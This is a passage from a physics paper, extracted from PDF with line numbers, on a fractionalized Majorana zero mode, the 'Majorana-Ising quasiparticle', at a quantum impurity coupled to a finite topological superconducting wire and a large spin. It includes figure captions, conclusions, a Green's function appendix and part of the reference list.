694
+ Here we propose that
695
+ it is still achievable to obtain GTotal(0) = e2
696
+ 2h for a finite
697
+ TSC wire and to perform also the isolation of a Majorana
698
+ quasiparticle at the QI site. In our setup, such an excita-
699
+ tion rises, in particular, dressed by the Ising interaction.
700
+ To this end, an integer large spin S should be accounted
701
+ for and be coupled to the QI with a special value in the
702
+ exchange interaction J. Thus, by evaluating J = Jh, the
703
+ amplitude GTotal(0) =
704
+ e2
705
+ 2h [Eq.(21)] finally becomes re-
706
+ stored. However, we will verify that such a configura-
707
+ tion corresponds to isolate a peculiar MZM, namely γB,
708
+ with a resonant peak characterized by the spectral weight
709
+ DOS(↑)[γB](0) = 1/2 [Eq.(19)], while for γA we have the
710
+ same amplitude, i.e., DOS(↑)[γA](0) = 1/2, but with a
711
+ dip instead.
712
+ Now, we consider the presence of a large spin S.
713
+ Figs.2(c) and (d) show the total conductance in the
714
+ presence of S = 3 and Jh = 1.335Γ [see inset b)-I
715
+ of Fig.3(b)] for a finite TSC with εM = Γ. The ZBP
716
+ conductance in Fig.2(c) is GTotal(0) =
717
+ e2
718
+ 2h as expected,
719
+ but the decomposition into ET and LAR channels de-
720
+ scribed in Fig.2(d) reveals a striking result: solely ET
721
+ survives, while LAR is completely suppressed at zero-
722
+ bias.
723
+ Below we will verify that the LAR suppression
724
+ corresponds to a quasiparticle localization in the DOS
725
+ for γB, which leads to DOS(↑)[γB](0) = 1/2. Thus, ac-
726
+ cording to Eq.(22), such a finite DOS contributes to a
727
+ conductance GγB(0) = GMIQ(0) =
728
+ e2
729
+ 4h, where we define
730
+ the MIQ γB ≡ γMIQ.
731
+ In order to understand the emergence of the MIQ,
732
+ we begin with the trivial case in Fig.3(a): the central
733
+ panel discriminates the electronic DOS(↑) into the corre-
734
+ sponding DOSs for γA and γB [Eq.(19)] with S = 0 and
735
+ εM = Γ. This case is regarded as trivial, once we verify
736
+ that in both the DOSs γA and γB resonant states pinned
737
+
738
+ 6
739
+ dI/dV (e2/h)[↑]
740
+ J=εM=0.0Γ
741
+ S=0.0
742
+ ε↑=0.0Γ λ1=2.12Γ
743
+ a)
744
+ c)
745
+ eV/Γ
746
+ dI/dV (e2/h)[↑]
747
+ b)
748
+ eV/Γ
749
+ d)
750
+ εM=1.0Γ
751
+ Jh=1.335Γ
752
+ S=3.0
753
+ Figure 2.
754
+ (Color online) (a) Total differential conductance
755
+ GTotal [Eq.(5)] versus the source-drain bias-voltage eV in units
756
+ of the QI-lead coupling Γ with isolated MZMs γ1 and γ2
757
+ (εM = 0) in the absence of a spin-polarized tip (S = 0).
758
+ As aftermath, a zero-bias peak (ZBP) emerges with ampli-
759
+ tude GTotal(0) = e2
760
+ 2h and characterizes the leaking of the MZM
761
+ γ1 from the TSC wire edge [Fig.1(c)] into the QI as γA [in-
762
+ set a)-I of Fig.3(a) and Refs.[3, 4]].
763
+ (b) The ZBP conduc-
764
+ tance can be split into finite contributions from the electron
765
+ tunneling (ET) and local Andreev reflection (LAR) processes
766
+ [Eq.(5)], namely, GET(0) and GLAR(0), respectively. This cor-
767
+ responds to the ideal case of an infinite TSC wire, wherein
768
+ these processes compete on equal footing.
769
+ (c) In the pres-
770
+ ence of a tip with S = 3 and exchange coupling at the sweet
771
+ spot J = Jh = 1.335Γ [inset b)-I of Fig.3(b)] for a finite wire
772
+ (εM = 1Γ), the amplitude GTotal(0) = e2
773
+ 2h is still observed and
774
+ denotes the existence of a MIQ γMIQ within the QI, but with
775
+ related differential conductance GMIQ(0) =
776
+ e2
777
+ 4h [Fig.3(c) and
778
+ Eqs.(21)-(22)]. (d) In the regime of (c), GLAR(0) is completely
779
+ quenched and solely the term GET(0) contributes to the ZBP.
780
+ at zero-energy ω = 0 are present. Schematically, the QI
781
+ fermionic state can be imagined as a sphere formed by
782
+ two MZMs depicted by two calottes. This is the manner
783
+ we outline pictorially the two zero-energy resonant states,
784
+ the so-called MZMs in the DOSs γA and γB. This sketch
785
+ can be found in the upper-right inset of Fig.3(a), in which
786
+ each calotte symbolizes the “half-fermionic” character
787
+ of the MZM. Equivalently, a calotte occupies the half-
788
+ volume of the sphere and as it corresponds to a MZM,
789
+ it can be surely characterized by DOS(↑)[γj](0) = 1. As
790
+ aftermath, according to Eqs.(20)-(22), these two MZMs
791
+ lead to the zero-bias conductance peak GTotal(0) = e2
792
+ h .
793
+ Concerning the satellite peaks in the DOS(↑)[γB], they
794
+ occur due to the overlap between the MZMs γB and
795
+ γ1. In the other hand, the inset panel a)-II of Fig.3(a)
796
+ shows the spin-down channel, which is the one decou-
797
+ pled from the TSC. To analyze it on the same footing
798
+ as the spin-up channel, we assume ε↓ = 0 and verifies
799
+ that both the MZMs γC and γD, which constitute this
800
+ spin sector of the QI, are then identified exactly by de-
801
+ generate resonant states. The evaluation of the DOSs for
802
+ the spin-down sector just employs the GFs for the spin-
803
+ up sector, but it disregards the superconducting terms.
804
+ As none of these MZMs overlap with γ1, a full super-
805
+ position of the lineshapes for these MZMs manifests in
806
+ the profiles of the DOSs γC and γD. Therefore, satellite
807
+ peaks do not emerge.
808
+ Now, let us go back to discuss
809
+ the spin-up channel. We should pay particular attention
810
+ to the case εM = 0 depicted in the inset panel a)-I of
811
+ Fig.3(a), which corresponds to the nonoverlapped situ-
812
+ ation between γ1 and γ2. This scenario is the ideal one
813
+ and it contains the pillars for the conductance behavior of
814
+ Fig.2(a). Notice that γB overlaps with γ1 leading to satel-
815
+ lite peaks in DOS(↑)[γB] and DOS(↑)[γB](0) = 0, while
816
+ γA is found isolated and localized as a well-defined reso-
817
+ nant zero-mode with spectral weight DOS(↑)[γA](0) = 1.
818
+ Thereafter, GTotal(0) = GγA(0) =
819
+ e2
820
+ 2h. This case is well-
821
+ known in literature [3, 4] and points out that the MZM
822
+ γA contributes to the conductance as a resonant state
823
+ in contrast to γB, which shows a gap in DOS(↑)[γB]
824
+ around zero-bias. This latter prevents a finite conduc-
825
+ tance, i.e., GγB(0) = 0. Below, we will see that by
826
+ turning-on the exchange J for a given S, the spectral
827
+ profiles for the DOS(↑)[γA] and DOS(↑)[γB] will exhibit
828
+ a multi-level structure. Additionally, these densities will
829
+ be responsible, according to Eq.(22), by a nonquantized
830
+ GTotal(0) ̸= e2
831
+ h in Eq.(21). In the situation of arbitrary J,
832
+ the contributions to GTotal(0) ̸= 0 will not arise from well-
833
+ defined resonant zero-mode states in DOS(↑)[γA] and
834
+ DOS(↑)[γB]. As we shall see next, the Majorana fermion
835
+ localization within the QI as a resonant zero-mode state
836
+ will only occur for the sweet spot J = Jh.
837
+ Fig.3(b) treats the presence of a large spin coupled
838
+ to the QI for εM = Γ. As we can notice, the Ising in-
839
+ teraction J = 5Γ for S = 3 clearly affects the spectral
840
+ profiles of DOS(↑)[γA] and DOS(↑)[γB]. Basically, it in-
841
+ troduces a multi-level structure for the satellite peaks
842
+ and modifies drastically the MZM localization around
843
+ the zero-bias.
844
+ Surprisingly, the DOS(↑)[γA] presents a
845
+ valley (dip) at zero-energy and a quasi-resonant MZM
846
+ rises in DOS(↑)[γB]. As a matter of fact, the latter cannot
847
+ be considered a well-defined resonant MZM: its spectral
848
+ weight is not exactly an integer or semi-integer number,
849
+ and the lineshape broadening does not obey a loretnzian-
850
+ like form to define a quasiparticle lifetime[38]. The line-
851
+ shapes of such spectral densities are then distinct, but
852
+ counterintuitively, their zero-bias values coincide, i.e.,
853
+ DOS(↑)[γA](0) = DOS(↑)[γB](0). As the spin-up sector
854
+ of the QI is the one coupled to the TSC, the spectral
855
+ profiles in the DOS(↑)[γA] and DOS(↑)[γB] do not fol-
856
+ low strictly the standard angular momentum theory for
857
+ the Zeeman splitting [Eq.(2)]. Usually, this theory en-
858
+ sures that for an integer S, 2S symmetrically displaced
859
+ levels around the corresponding at ω = ε↑ = 0 should
860
+ emerge.
861
+ Here, indeed we observe a mirror-symmetric
862
+ set with S energy bands below and above the zero-bias,
863
+ respectively, where nearby peculiar spectral structures
864
+ rise.
865
+ We reveal that the profiles differ significantly in
866
+ this range, as aftermath of the nontrivial interplay be-
867
+ tween the TSC and Ising exchange term. In Figs.4(d)-
868
+
869
+ 7
870
+ ω(Γ)
871
+ DOS(↑)[γj]
872
+ DOS(↑)[γj]
873
+ ω(Γ)
874
+ c)-I
875
+ εM⟶∞
876
+ DOS(↑)[γj]
877
+ DOS(↑)[γj]
878
+ GMIQ(0)=
879
+ e2/4h
880
+ a)
881
+ b)
882
+ c)
883
+ b)-I
884
+ εM=1.0Γ ε↑=0.0Γ λ1=2.12Γ
885
+ S=0.0
886
+ J=5.0Γ
887
+ S=3.0
888
+ Jh=1.335Γ
889
+ S=3.0
890
+ Valley
891
+ Overlapped
892
+ case
893
+ Valley
894
+ Quasi-
895
+ resonant
896
+ MZM
897
+ MIQ
898
+ γA+γB
899
+
900
+ QI
901
+ DOS(↑)[γj]
902
+ ω(Γ)
903
+ a)-I
904
+ εM=0.0Γ
905
+ γA
906
+
907
+ QI
908
+ Nonoverlapped case
909
+ Highly
910
+ overlapped
911
+ case
912
+ Resonant
913
+ MZM
914
+ Jh Sweet
915
+ spot
916
+ DOS(↑)(ω=0.0Γ)
917
+ J(Γ)
918
+ S=0.0
919
+ S=5.0
920
+ S=10.0
921
+ S=3.0
922
+ DOS(↓)[γj]
923
+ ω(Γ)
924
+ b)-II
925
+ Decoupled
926
+ channel
927
+ DOS(↓)[γj]
928
+ ω(Γ)
929
+ a)-II
930
+ γC+γD
931
+
932
+ QI
933
+ Decoupled
934
+ channel
935
+ γMIQ
936
+
937
+ QI
938
+ GγA(0)=e2/2h
939
+ GγA(0)=e2/4h
940
+ ω(Γ)
941
+ DOS(↓)[γj]
942
+ c)-II
943
+ Decoupled
944
+ channel
945
+ Figure 3.
946
+ (Color online) (a) The central panel shows the
947
+ frequency dependence of the normalized densities of states
948
+ (DOSs) for the MZMs γA and γB [Eq.(19)] for the spin-up
949
+ channel within the QI by assuming the spin-polarized tip ab-
950
+ sent and the MZMs γ1 and γ2 overlapped (εM = 1Γ) in the
951
+ TSC. In each DOS we find a resonant MZM, which corre-
952
+ sponds to a “half-fermionic” state of the QI depicted as the
953
+ green sphere in the upper-right inset.
954
+ This sphere has in-
955
+ ner MZMs represented by calottes to denote the half-fermion
956
+ nature of the MZM. In the nonoverlapped situation, only
957
+ the calotte γA prevails [inset a)-I]. It leads to GTotal(0) =
958
+ GγA(0) =
959
+ e2
960
+ 2h in Fig.2(a) [Eqs.(21)-(22)]. For the spin-down
961
+ channel, which is decoupled from the TSC, the MZMs γC and
962
+ γD within the QI stay paired permanently [inset a)-II]. (b) In
963
+ the presence of S = 3 and J = 5Γ for εM = 1Γ the DOS for
964
+ γA changes drastically exhibiting a valley at ω = 0 instead
965
+ of a peak, while for γB the zero-mode is not-well defined. To
966
+ restore the ZBP GTotal(0) =
967
+ e2
968
+ 2h we should choose the right
969
+ J for a given S, i.e., the sweet spot J = Jh [panel b)-I for
970
+ the QI DOS of Eq.(20) imposing DOS(↑)(0) = 1/2]. In the
971
+ spin-down channel, the γC and γD DOSs are degenerate with
972
+ a 2S + 1 multi-level structure [panel b)-II]. (c) The choice
973
+ J = Jh = 1.335Γ for S = 3 completely defines the valley
974
+ and peak for the DOSs γA and γB, respectively, where in the
975
+ latter we introduce γB ≡ γMIQ as the Majorana-Ising quasi-
976
+ particle, once the peak clearly represents the unique MZM
977
+ isolated in the system. It is characterized by a ZBP given
978
+ by GMIQ(0) = e2
979
+ 4h pictorially illustrated by the half-calotte in
980
+ the lower-right inset for the green sphere representing the QI
981
+ fermionic state. However, GTotal(0) = GγA(0)+GMIQ(0) = e2
982
+ 2h.
983
+ (f) we will see that the manifestation of this effect relies
984
+ within a region comprised by cone-like walls spanned by
985
+ ω and εM in the DOSs of the system. Within the cone,
986
+ the Zeeman splitting becomes unusual and the energy
987
+ spacing between the levels is simultaneously governed by
988
+ J and εM. Besides, solely the spin-down channel shows
989
+ standard Zeeman splitting, once it does not perceive the
990
+ TSC. This can be verified in the inset panel b)-II of
991
+ Fig.3(b), where the DOSs for γC and γD, as expected,
992
+ present the ordinary 2S +1 multi-level structure ensured
993
+ by Eq.(2).
994
+ We highlight that upon decreasing the ex-
995
+ change parameter J, the restoration of the conductance
996
+ GTotal(0) =
997
+ e2
998
+ 2h can be still allowed.
999
+ Thus, we should
1000
+ remember that such a conductance arises from the ful-
1001
+ fillment of the condition DOS(↑)(0) = 1/2. Particularly
1002
+ in the inset panel b)-I of Fig.3(b), we show exactly the
1003
+ points where this happens by considering several values
1004
+ of S and εM ̸= 0. Particularly for S = 3, this sweet spot
1005
+ occurs for J = Jh = 1.335Γ and its dependence on εM is
1006
+ revealed as very weak according to our numerical calcu-
1007
+ lations (not shown). It means that J = Jh = 1.335Γ still
1008
+ keeps the value DOS(↑)(0) = 1/2 while εM does not ex-
1009
+ ceed very much Γ (εM ≫ Γ). Experimentally speaking,
1010
+ J can be tuned by changing the tip-QI vertical distance.
1011
+ Thus for εM ̸= 0, GTotal(0) drops from e2
1012
+ h to
1013
+ e2
1014
+ 2h when
1015
+ J = Jh. Hence, at the sweet spot, if one knows previ-
1016
+ ously the spin S of the tip, Jh can be extracted from
1017
+ Fig.3 b)-I or vice-versa.
1018
+ In Fig.3(c) we present the case J = Jh = 1.335Γ that
1019
+ leads to our main finding: a perfect localization of a
1020
+ resonant state at zero-energy in DOS(↑)[γB], with spec-
1021
+ tral weight DOS(↑)[γB](0) = 1/2. The latter amplitude
1022
+ points out that the ordinary MZM now is fractionalized
1023
+ and the value DOS(↑)[γB](0) = 1 is not present any-
1024
+ more. This fractionalized MZM, the called MIQ by us,
1025
+ then leads to a conductance GγB(0) = GMIQ(0) = e2
1026
+ 4h as
1027
+ ensured by Eq.(22).
1028
+ The value DOS(↑)[γB](0) = 1/2
1029
+ can be pictorially viewed by the half-calotte found in
1030
+ the lower-right inset of Fig.3(c), which symbolizes the
1031
+ MZM fractionalization within the QI state. Nevertheless,
1032
+ to complete the total conductance GTotal(0) =
1033
+ e2
1034
+ 2h, the
1035
+ zero-bias value for DOS(↑)[γA](0) should coincide, i.e.,
1036
+ DOS(↑)[γA](0) = 1/2 and as aftermath, GγA(0) =
1037
+ e2
1038
+ 4h
1039
+ as well.
1040
+ Here we emphasize that in DOS(↑)[γA](0) a
1041
+ quantum destructive interference manifests and a reso-
1042
+ nant state does not rise at zero-bias.
1043
+ Moreover, it is
1044
+ capital to clarify the underlying mechanism to produce
1045
+ the MIQ: the key idea is the decrease of J, thus forcing
1046
+ the merge of the 2S side bands (satellite peaks) of the
1047
+ system towards the zero-energy, where a resonant level is
1048
+ pinned. As a result, this sum of amplitudes for the satel-
1049
+ lite peaks interferes constructively at zero-energy giving
1050
+ rise to DOS(↑)(0) = 1/2 for J = Jh. Further, our findings
1051
+ do not depend on the sign of J and in case of a semi-
1052
+ integer large spin, the multi-level structure is odd and a
1053
+ zero-energy is absent in the spectrum. In this manner,
1054
+ the MIQ cannot be excited. Concerning the inset pan-
1055
+
1056
+ 8
1057
+ DOS(↑)[γA]
1058
+ εM(Γ)
1059
+ DOS(↑)[γB]
1060
+ DOS(↑)
1061
+ ω(Γ)
1062
+ DOS(↑)
1063
+ ω(Γ)
1064
+ DOS(↑)
1065
+ ε↑=0.0Γ λ1=2.12Γ
1066
+ J=5.0Γ
1067
+ S=3.0
1068
+ Jh=1.335Γ
1069
+ S=3.0
1070
+ DOS(↑)[γB]
1071
+ DOS(↑)[γB]
1072
+ DOS(↑)[γA]
1073
+ DOS(↑)[γA]
1074
+ εM(Γ)
1075
+ εM(Γ)
1076
+ S=0.0
1077
+ a)
1078
+ b)
1079
+ c)
1080
+ d)
1081
+ e)
1082
+ f)
1083
+ g)
1084
+ h)
1085
+ i)
1086
+ ω(Γ)
1087
+ Resonant MZM
1088
+ Resonant MZM
1089
+ Resonant
1090
+ zero mode
1091
+ Valley
1092
+ Quasi-resonant
1093
+ MZM
1094
+ Valley
1095
+ MIQ
1096
+ Cone-like wall
1097
+ Figure 4.
1098
+ (Color online) Color maps of Eqs.(9) and (19) for the QI, γA and γB DOSs, respectively, spanned by the frequency
1099
+ ω and εM: (a) In the case S = 0, the ZBP in the DOS(↑) arises from the individual ZBPs found in DOS(↑)[γA] [panel(b)] and
1100
+ DOS(↑)[γB] [panel(c)], due to the MZMs γA and γB that act as the building-blocks of the QI state ε↑ = 0 [Eq.(20)]. They reveal
1101
+ that the system does not contain isolated MZMs and that the overlapped γ1 and γ2 split the zero-mode energy state leading
1102
+ to the upper and lower arcs in panels (a) and (c). Panels (d)-(f) reveal the influence of S = 3 and J = 5Γ on the QI, where we
1103
+ can clearly see a 2S + 1 multi-level structure centered at ω = 0. The upper and lower arcs, distinctly, show 2S levels each. The
1104
+ central region of (e) has a valley-type structure in contrast to that for (f), which points out a quasi-resonant MZM. In both the
1105
+ cases, the 2S + 1 multi-level structure is delimited by cone-like walls up to a threshold in εM (not indicated), where above it
1106
+ the DOS(↑)[γA] and DOS(↑)[γB] exhibit a zero-mode with the lines of the walls parallel to each other. For this situation, the
1107
+ TSC plays no role and the MZMs γA and γB stay paired as in (a)-(c). Panels (g)-(i) hold for the sweet spot J = Jh = 1.335Γ,
1108
+ where we have the zero-frequency valley and peak well-resolved in the DOS(↑)[γA] and DOS(↑)[γB], respectively. In the latter,
1109
+ the MIQ rises as aftermath of the partial merge of the 2S + 1 multi-level structure centered at ω = 0 upon decreasing the
1110
+ coupling J. We call the attention that the vertical lines represent slice cuts of the cases profoundly explored in Figs.2 and 3.
1111
+ els c)-I and c)-II of Fig.3(c), we verify that for εM ≫ Γ
1112
+ (or εM → ∞) the DOSs for the Majorana fermions are
1113
+ degenerate. For extremely short TSC wires (εM → ∞),
1114
+ the energy level εM for the orbital f [Eq.(3)] is highly
1115
+ off resonance the QI energy ε↑ = 0, thus making the
1116
+ QI and the TSC to decouple from each other. Thus, the
1117
+ spin-up channel behaves as the corresponding spin-down,
1118
+ which is the one permanently decoupled from the TSC.
1119
+ This implies that the MIQ cannot be seen for very short
1120
+ wires.
1121
+ Fig.4 summarizes our findings exhibiting color maps of
1122
+ Eqs.(9) and (19) for the electronic and Majorana DOSs,
1123
+ respectively and spanned by ω and εM. Panels (a)-(c) de-
1124
+ scribe the case S = 0, which is characterized by DOS(↑
1125
+ )(0) = 1 and DOS(↑)[γA](0) = DOS(↑)[γB](0) = 1. This
1126
+ corresponds to the trivial regime where two MZMs local-
1127
+ ize around zero-bias and appear at the QI site. Such a
1128
+ characteristic relies in the zero-bias peaks and appears as
1129
+ horizontal lines in the representation of panels (a)-(c) for
1130
+ any finite value of εM. As we can see, the satellite peaks
1131
+ in (a) arise from (c). By turning-on the Ising interaction
1132
+ with S = 3 and J = 5Γ, the spectral profiles of the DOSs
1133
+ acquire distinct patterns: the satellite peaks obey ap-
1134
+ proximately the standard angular momentum theory for
1135
+ the Zeeman splitting, thus exhibiting 2S split side-bands.
1136
+ In this situation, the linear dependence on the exchange
1137
+
1138
+ 9
1139
+ parameter J is lacking. Besides, the central regions of
1140
+ panels (a)-(c) are converted into the domains delimited
1141
+ by cone-like walls as those found in (d)-(f). While these
1142
+ walls persist up to a threshold in εM (not marked in the
1143
+ figure), a sophisticated interplay between the TSC and
1144
+ the Ising interaction rules the Physics of the system and
1145
+ allows the possibility of the MIQ existence. Notice that
1146
+ for εM > Γ, a 2S + 1 multi-level central structure fi-
1147
+ nally becomes resolved. It is worth mentioning that for
1148
+ εM = Γ, the line cuts in Fig.4 given by the vertical dashed
1149
+ lines, then correspond to the cases discussed in detail in
1150
+ Fig.3. In panels (e) and (f) we notice the rising of the
1151
+ valley and the quasi-resonant MZM spectral structures,
1152
+ respectively upon increasing εM. However, much above
1153
+ the threshold in εM, the linear spacing in J for the Zee-
1154
+ man splitting is restored and this situation is that de-
1155
+ limited by the marked horizontal dashed lines. Finally,
1156
+ panels (g)-(i) show the merge of the multi-level struc-
1157
+ ture in the sweet spot J = Jh = 1.335Γ leading to the
1158
+ emergence of the MIQ in the Majorana channel γB, while
1159
+ the valley continues in the channel γA. Therefore, within
1160
+ the cone-like walls domain, the sector γB of Majorana
1161
+ fermions for the QI makes explicit a constructive inter-
1162
+ ference process at zero-bias, while the corresponding in
1163
+ γA displays a destructive behavior. In this regime, the
1164
+ conductance GLAR(0) becomes fully quenched and just
1165
+ GET(0) contributes to GTotal(0) = e2
1166
+ 2h [Fig.2(d)].
1167
+ V.
1168
+ CONCLUSIONS
1169
+ We found that the fractionalization of regular MZMs
1170
+ becomes a feasible task once an integer large spin S is
1171
+ exchange coupled to a quantum impurity, in particular
1172
+ when it acts as the new edge of a finite TSC in 1D. A
1173
+ counterintuitive regime arises due to a sweet value for
1174
+ the Ising coupling, which is capable of isolating a frac-
1175
+ tionalized MZM. We introduce such an excitation as the
1176
+ called Majorana-Ising-type quasiparticle (MIQ). As af-
1177
+ termath, we report the emergence of one MZM with the
1178
+ maximum spectral weight reduced by half and exhibiting
1179
+ resonant character. In contrast, the other MZM mode in
1180
+ the QI does not localize around zero-energy, but shows
1181
+ the same spectral weight of the resonant MZM via an
1182
+ antiresonant profile. Interestingly enough, due to the lo-
1183
+ calization of the MIQ, half of the quantum conductance
1184
+ is made essentially by the normal electronic contribution,
1185
+ while that from the Andreev reflection is totally lacking
1186
+ in such a situation. This behavior differs from that ob-
1187
+ served in perfectly infinite TSC wires, in which one MZM
1188
+ localizes at QI site with maximum spectral weight given
1189
+ by unit and with electronic and Andreev conductances
1190
+ equally split at zero-bias. Therefore, our proposal points
1191
+ out a manner to induce, within a more realistic perspec-
1192
+ tive from an experimental point of view, a quantum state
1193
+ at the edge of a short TSC in 1D. In this way, we expect
1194
+ that our MIQ can be employed as a potential building-
1195
+ block in majorana-based quantum computing.
1196
+ VI.
1197
+ ACKNOWLEDGMENTS
1198
+ We
1199
+ thank
1200
+ the
1201
+ Brazilian
1202
+ funding
1203
+ agencies
1204
+ CNPq
1205
+ (Grants.
1206
+ Nr.
1207
+ 302887/2020-2,
1208
+ 308410/2018-1,
1209
+ 311980/2021-0, 305668/2018-8 and 308695/2021-6), Co-
1210
+ ordena¸c˜ao de Aperfei¸coamento de Pessoal de N´ıvel Supe-
1211
+ rior - Brasil (CAPES) – Finance Code 001 and FAPERJ
1212
+ process Nr. 210 355/2018. LSR and IAS acknowledge
1213
+ the support from Icelandic Research Fund (Rannis),
1214
+ projects No. 163082-051 and “Hybrid polaritonics”. IAS
1215
+ also acknowledges support from the Program Priority
1216
+ 2030. LSR thanks ACS and Unesp for their hospitality.
1217
+ Appendix A: Green’s functions
1218
+ As the GFs in the presence of the large spin obey the
1219
+ notation ⟨⟨Aσ|Bσ⟩⟩ = �
1220
+ m⟨⟨Aσ|m⟩⟨m||Bσ⟩⟩[54], here we
1221
+ make explicit the details in the EOM approach to find
1222
+ the elements of type ⟨⟨Aσ|m⟩⟨m||Bσ⟩⟩. In what follows,
1223
+ we have
1224
+ (ω+ − ε↑ − Jm
1225
+ 2
1226
+ + iΓ)⟨⟨d↑|m⟩⟨m||d†
1227
+ ↑⟩⟩
1228
+ =
1229
+ 1
1230
+ 2S + 1 − t⟨⟨f|m⟩⟨m||d†
1231
+ ↑⟩⟩ − ∆⟨⟨f †|m⟩⟨m||d†
1232
+ ↑⟩⟩,
1233
+ (A1)
1234
+ (ω+ + ε↑ + Jm
1235
+ 2
1236
+ + iΓ)⟨⟨d†
1237
+ ↑|m⟩⟨m||d↑⟩⟩
1238
+ =
1239
+ 1
1240
+ 2S + 1 + t⟨⟨f †|m⟩⟨m||d↑⟩⟩ + ∆⟨⟨f|m⟩⟨m||d↑⟩⟩,
1241
+ (A2)
1242
+ the other two terms are given by
1243
+ (ω+ + ε↑ + Jm
1244
+ 2
1245
+ + iΓ)⟨⟨d†
1246
+ ↑|m⟩⟨m||d†
1247
+ ↑⟩⟩
1248
+ = t⟨⟨f †|m⟩⟨m||d†
1249
+ ↑⟩⟩ + ∆⟨⟨f|m⟩⟨m||d†
1250
+ ↑⟩⟩
1251
+ (A3)
1252
+ and
1253
+ (ω+ − ε↑ − Jm
1254
+ 2
1255
+ + iΓ)⟨⟨d↑|m⟩⟨m||d↑⟩⟩
1256
+ = −t⟨⟨f|m⟩⟨m||d↑⟩⟩ − ∆⟨⟨f †|m⟩⟨m||d↑⟩⟩
1257
+ (A4)
1258
+ And finally the last two GFs associated with the f site
1259
+ is
1260
+ ⟨⟨f|m⟩⟨m||d↑⟩⟩ =
1261
+ −t
1262
+ (ω+ − εM)⟨⟨d↑|m⟩⟨m||d↑⟩⟩
1263
+ +
1264
+
1265
+ (ω+ − εM)⟨⟨d†
1266
+ ↑|m⟩⟨m||d↑⟩⟩ (A5)
1267
+ and
1268
+ ⟨⟨f †|m⟩⟨m||d↑⟩⟩ =
1269
+ t
1270
+ (ω+ + εM)⟨⟨d†
1271
+ ↑|m⟩⟨m||d↑⟩⟩
1272
+
1273
+
1274
+ (ω+ + εM)⟨⟨d↑|m⟩⟨m||d↑⟩⟩.(A6)
1275
+ With this group of GFs we can determine the complete
1276
+ description of the QI.
1277
+
1278
+ 10
1279
+ [1] E.
1280
+ Majorana,
1281
+ Il
1282
+ Nuovo
1283
+ Cimento
1284
+ (1924-1942)
1285
+ 14,
1286
+ 10.1007/BF02961314 (1937).
1287
+ [2] P. Marra, Journal of Applied Physics 132, 231101 (2022).
1288
+ [3] D. E. Liu and H. U. Baranger, Phys. Rev. B 84, 201308
1289
+ (2011).
1290
+ [4] E. Vernek, P. H. Penteado, A. C. Seridonio, and J. C.
1291
+ Egues, Phys. Rev. B 89, 165314 (2014).
1292
+ [5] M. Duckheim and P. W. Brouwer, Phys. Rev. B 83,
1293
+ 054513 (2011).
1294
+ [6] R. M. Lutchyn, J. D. Sau, and S. Das Sarma, Phys. Rev.
1295
+ Lett. 105, 077001 (2010).
1296
+ [7] O. Lesser and Y. Oreg, Journal of Physics D: Applied
1297
+ Physics 55, 164001 (2022).
1298
+ [8] F. Pientka, L. I. Glazman, and F. von Oppen, Phys. Rev.
1299
+ B 89, 180505 (2014).
1300
+ [9] Y. Oreg, G. Refael, and F. von Oppen, Phys. Rev. Lett.
1301
+ 105, 177002 (2010).
1302
+ [10] F. Pientka, L. I. Glazman, and F. von Oppen, Phys. Rev.
1303
+ B 88, 155420 (2013).
1304
+ [11] J. Li, H. Chen, I. K. Drozdov, A. Yazdani, B. A.
1305
+ Bernevig, and A. H. MacDonald, Phys. Rev. B 90,
1306
+ 235433 (2014).
1307
+ [12] J. Klinovaja, P. Stano, A. Yazdani, and D. Loss, Phys.
1308
+ Rev. Lett. 111, 186805 (2013).
1309
+ [13] S. Nadj-Perge, I. K. Drozdov, B. A. Bernevig, and
1310
+ A. Yazdani, Phys. Rev. B 88, 020407 (2013).
1311
+ [14] L. Fu and C. L. Kane, Phys. Rev. B 79, 161408 (2009).
1312
+ [15] L. Fu and C. L. Kane, Phys. Rev. Lett. 100, 096407
1313
+ (2008).
1314
+ [16] M. M. Vazifeh and M. Franz, Phys. Rev. Lett. 111,
1315
+ 206802 (2013).
1316
+ [17] S. Nakosai, Y. Tanaka, and N. Nagaosa, Phys. Rev. B
1317
+ 88, 180503 (2013).
1318
+ [18] B. Braunecker and P. Simon, Phys. Rev. Lett. 111,
1319
+ 147202 (2013).
1320
+ [19] A. C. Potter and P. A. Lee, Phys. Rev. B 85, 094516
1321
+ (2012).
1322
+ [20] S. B. Chung, H.-J. Zhang, X.-L. Qi, and S.-C. Zhang,
1323
+ Phys. Rev. B 84, 060510 (2011).
1324
+ [21] C. W. J. Beenakker, Rev. Mod. Phys. 87, 1037 (2015).
1325
+ [22] M. Sato and S. Fujimoto, Journal of the Physical Society
1326
+ of Japan 85, 072001 (2016).
1327
+ [23] M. Sato and Y. Ando, Reports on Progress in Physics
1328
+ 80, 076501 (2017).
1329
+ [24] A. Haim and Y. Oreg, Physics Reports 825, 1 (2019),
1330
+ time-reversal-invariant topological superconductivity in
1331
+ one and two dimensions.
1332
+ [25] J. Alicea, Reports on Progress in Physics 75, 076501
1333
+ (2012).
1334
+ [26] C. Beenakker, Annual Review of Condensed Matter
1335
+ Physics 4, 113 (2013).
1336
+ [27] A. S. Karsten Flensberg, Felix von Oppen, Nature Re-
1337
+ views Materials 6, 944 (2021).
1338
+ [28] K. Laubscher and J. Klinovaja, Journal of Applied
1339
+ Physics 130, 081101 (2021).
1340
+ [29] M. T. Deng, S. Vaitiekenas, E. B. Hansen, J. Danon,
1341
+ M. Leijnse, K. Flensberg, J. Nygard, P. Krogstrup, and
1342
+ C. M. Marcus, Science 354, 1557 (2016).
1343
+ [30] V. Mourik, K. Zuo, S. M. Frolov, S. R. Plissard, E. P.
1344
+ A. M. Bakkers, and L. P. Kouwenhoven, Science 336,
1345
+ 1003 (2012).
1346
+ [31] F. Nichele, A. C. C. Drachmann, A. M. Whiticar, E. C. T.
1347
+ O’Farrell, H. J. Suominen, A. Fornieri, T. Wang, G. C.
1348
+ Gardner, C. Thomas, A. T. Hatke, P. Krogstrup, M. J.
1349
+ Manfra, K. Flensberg, and C. M. Marcus, Phys. Rev.
1350
+ Lett. 119, 136803 (2017).
1351
+ [32] A. Y. Kitaev, Physics-Uspekhi 44, 131 (2001).
1352
+ [33] S. Nadj-Perge, I. K. Drozdov, J. Li, H. Chen, S. Jeon,
1353
+ J. Seo, A. H. MacDonald, B. A. Bernevig, and A. Yaz-
1354
+ dani, Science 346, 602 (2014).
1355
+ [34] M. Ruby, F. Pientka, Y. Peng, F. von Oppen, B. W.
1356
+ Heinrich, and K. J. Franke, Phys. Rev. Lett. 115, 197204
1357
+ (2015).
1358
+ [35] R. Pawlak, M. Kisiel, J. Klinovaja, T. Meier, S. Kawai,
1359
